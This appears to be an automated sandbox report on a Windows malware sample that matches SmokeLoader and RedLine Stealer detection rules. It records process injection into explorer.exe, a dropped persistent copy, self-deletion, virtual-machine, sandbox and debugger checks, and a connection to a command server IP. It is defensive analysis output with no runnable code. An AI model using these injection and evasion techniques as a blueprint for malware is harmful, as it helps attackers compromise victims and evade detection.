    Source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401553
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_00403005 RtlCreateUserThread,NtTerminateProcess,0_2_00403005
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401561
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156B
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_0040156F
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,EntryPoint,0_2_00401729
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_004023E5 NtQuerySystemInformation,0_2_004023E5
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401583
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401587
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_004026A0 NtEnumerateKey,0_2_004026A0
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401553
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00403005 RtlCreateUserThread,NtTerminateProcess,6_2_00403005
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401561
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156B
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_0040156F
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,EntryPoint,6_2_00401729
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_004023E5 NtQuerySystemInformation,6_2_004023E5
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401583
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,6_2_00401587
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_004026A0 NtEnumerateKey,6_2_004026A0
    Source: C:\Windows\explorer.exeCode function: 2_2_02F229682_2_02F22968
    Source: C:\Windows\explorer.exeCode function: 2_2_087529682_2_08752968
    Source: vwaoMjcyAw.exe, 00000000.00000000.2199081111.0000000002AFC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSpace2 vs vwaoMjcyAw.exe
    Source: vwaoMjcyAw.exeBinary or memory string: OriginalFilenameSpace2 vs vwaoMjcyAw.exe
    Source: vwaoMjcyAw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000006.00000002.2485885145.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.2270182856.0000000002D02000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.2269300413.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000006.00000002.2486160796.0000000002EC3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000002.00000002.3447329337.0000000008751000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000000.00000002.2269686012.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000002.00000002.3444065573.0000000002F21000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTRMatched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
    Source: vwaoMjcyAw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: ifvwgru.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/2@2/1
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_02D095D9 CreateToolhelp32Snapshot,Module32First,0_2_02D095D9
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ifvwgruJump to behavior
    Source: vwaoMjcyAw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: vwaoMjcyAw.exeReversingLabs: Detection: 73%
    Source: vwaoMjcyAw.exeVirustotal: Detection: 76%
    Source: unknownProcess created: C:\Users\user\Desktop\vwaoMjcyAw.exe "C:\Users\user\Desktop\vwaoMjcyAw.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\ifvwgru C:\Users\user\AppData\Roaming\ifvwgru
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: vwaoMjcyAw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\dugo_caves\betuw sib.pdb source: vwaoMjcyAw.exe, ifvwgru.2.dr

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeUnpacked PE file: 0.2.vwaoMjcyAw.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\ifvwgruUnpacked PE file: 6.2.ifvwgru.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_00403253 push eax; ret 0_2_0040332D
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_00401C64 push es; retf 0_2_00401C83
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_0040332A push eax; ret 0_2_0040332D
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_00402F91 push 60B44389h; retf 0_2_00402FAB
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_02BB2FF8 push 60B44389h; retf 0_2_02BB3012
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_02BB1CCB push es; retf 0_2_02BB1CEA
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00403253 push eax; ret 6_2_0040332D
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00401C64 push es; retf 6_2_00401C83
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_0040332A push eax; ret 6_2_0040332D
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_00402F91 push 60B44389h; retf 6_2_00402FAB
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_02C41CCB push es; retf 6_2_02C41CEA
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_02C42FF8 push 60B44389h; retf 6_2_02C43012
    Source: vwaoMjcyAw.exeStatic PE information: section name: .text entropy: 7.821971719130902
    Source: ifvwgru.2.drStatic PE information: section name: .text entropy: 7.821971719130902
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ifvwgruJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ifvwgruJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Deletes itself after installation
    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\vwaomjcyaw.exeJump to behavior
    Hides that the sample has been downloaded from the Internet (zone.identifier)
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ifvwgru:Zone.Identifier read attributes | deleteJump to behavior

    Malware Analysis System Evasion

    barindex
    Checks if the current machine is a virtual machine (disk enumeration)
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Switches to a custom stack to bypass stack traces
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeAPI/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeAPI/Special instruction interceptor: Address: 7FFDB442D584
    Source: C:\Users\user\AppData\Roaming\ifvwgruAPI/Special instruction interceptor: Address: 7FFDB442E814
    Source: C:\Users\user\AppData\Roaming\ifvwgruAPI/Special instruction interceptor: Address: 7FFDB442D584
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: ifvwgru, 00000006.00000002.2486092912.0000000002EBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKA
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 457Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 462Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 885Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868Jump to behavior
    Source: C:\Windows\explorer.exe TID: 6504Thread sleep count: 457 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 3880Thread sleep count: 462 > 30Jump to behavior
    Source: explorer.exe, 00000002.00000000.2256911237.000000000C354000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 00000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&B
    Source: explorer.exe, 00000002.00000002.3451553162.000000000C354000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ?\#CdRom&Ven_NECVMWar&Prod_VMware_
    Source: explorer.exe, 00000002.00000000.2254640839.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3447903568.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
    Source: explorer.exe, 00000002.00000000.2255032281.00000000097F3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000002.00000002.3447903568.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000973C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWws
    Source: explorer.exe, 00000002.00000000.2256911237.000000000C354000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2255032281.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
    Source: explorer.exe, 00000002.00000000.2254640839.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
    Source: explorer.exe, 00000002.00000000.2251375594.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2251375594.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
    Source: explorer.exe, 00000002.00000002.3447903568.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2254640839.000000000978C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000002.00000002.3445199941.00000000073E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: explorer.exe, 00000002.00000000.2255032281.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
    Source: explorer.exe, 00000002.00000000.2251375594.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: explorer.exe, 00000002.00000000.2251375594.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000002.00000000.2255032281.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_02BB0D90 mov eax, dword ptr fs:[00000030h]0_2_02BB0D90
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_02BB092B mov eax, dword ptr fs:[00000030h]0_2_02BB092B
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeCode function: 0_2_02D08EB6 push dword ptr fs:[00000030h]0_2_02D08EB6
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_02C40D90 mov eax, dword ptr fs:[00000030h]6_2_02C40D90
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_02C4092B mov eax, dword ptr fs:[00000030h]6_2_02C4092B
    Source: C:\Users\user\AppData\Roaming\ifvwgruCode function: 6_2_02EC9B4E push dword ptr fs:[00000030h]6_2_02EC9B4E

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Benign windows process drops PE files
    Source: C:\Windows\explorer.exeFile created: ifvwgru.2.drJump to dropped file
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80Jump to behavior
    Creates a thread in another existing process (thread injection)
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeThread created: C:\Windows\explorer.exe EIP: 8751A88Jump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruThread created: unknown EIP: 2F21A88Jump to behavior
    Maps a DLL or memory area into another process
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\Desktop\vwaoMjcyAw.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\ifvwgruSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: explorer.exe, 00000002.00000000.2251640669.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3443741534.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
    Source: explorer.exe, 00000002.00000002.3445039126.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2251640669.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3443741534.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000002.00000000.2251640669.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3443741534.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
    Source: explorer.exe, 00000002.00000002.3443287218.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2251375594.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
    Source: explorer.exe, 00000002.00000000.2251640669.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3443741534.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 00000002.00000002.3448807647.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2255032281.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
    Source: C:\Windows\explorer.exeCode function: 2_2_087535B8 GetUserNameW,2_2_087535B8

    Stealing of Sensitive Information

    barindex
    Yara detected SmokeLoader
    Source: Yara matchFile source: 00000006.00000002.2485910630.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000006.00000002.2485978515.0000000002CB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.2269955686.0000000002CD1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
